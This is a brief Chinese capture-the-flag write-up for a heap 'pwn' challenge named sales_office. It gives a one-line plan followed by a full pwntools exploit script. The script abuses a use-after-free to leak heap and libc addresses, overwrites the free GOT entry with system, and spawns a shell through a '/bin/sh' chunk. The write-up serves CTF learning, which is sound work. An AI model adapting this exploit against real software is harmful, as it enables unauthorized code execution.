orz沒趕上回家已經5點半了就回顧了一下pwn題
挺好的出的(遠程可能爲ubuntu18)我這用的是ubuntu16
思路
就是uaf控制好堆塊然後寫到got表leaklibc然後再次做一次寫free爲system即可
exp:
#!/usr/bin/python2
from pwn import *
def pwn():
p=process('./sales_office')
elf=ELF('./sales_office')
libc=ELF('./libc.so.6')
def add(size,data):
p.sendlineafter(':','1')
p.sendlineafter(':',str(size))
p.sendafter(':',data)
def show(idx):
p.sendlineafter(':','3')
p.sendlineafter(':',str(idx))
def delete(idx):
p.sendlineafter(':','4')
p.sendlineafter(':',str(idx))
add(0x50,'\x02'*2)#0
add(0x50,'\x01'*1)#1
add(0x50,'\x03'*3)#2
delete(0)
delete(1)
delete(2)
add(0x18,'\xb0')
show(1)
p.recvuntil(':\n')
heap_base=u32(p.recv(4))-0x20
log.success('heap_base: '+hex(heap_base))
delete(1)
add(0x50,p64(0x601ffa))
add(0x50,'dd')
add(0x50,'dd')
add(0x50,'a'*0xe)
show(7)
libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['free']
system=libcbase+libc.sym['system']
delete(1)
delete(0)
delete(6)
add(0x50,p64(0x601ffa))
add(0x50,'/bin/sh\x00')
add(0x50,'/bin/sh\x00')
add(0x50,'a'*0xe+p64(system))
delete(0)
log.success('libcbase: '+hex(libcbase))
p.interactive()
if __name__=="__main__":
pwn()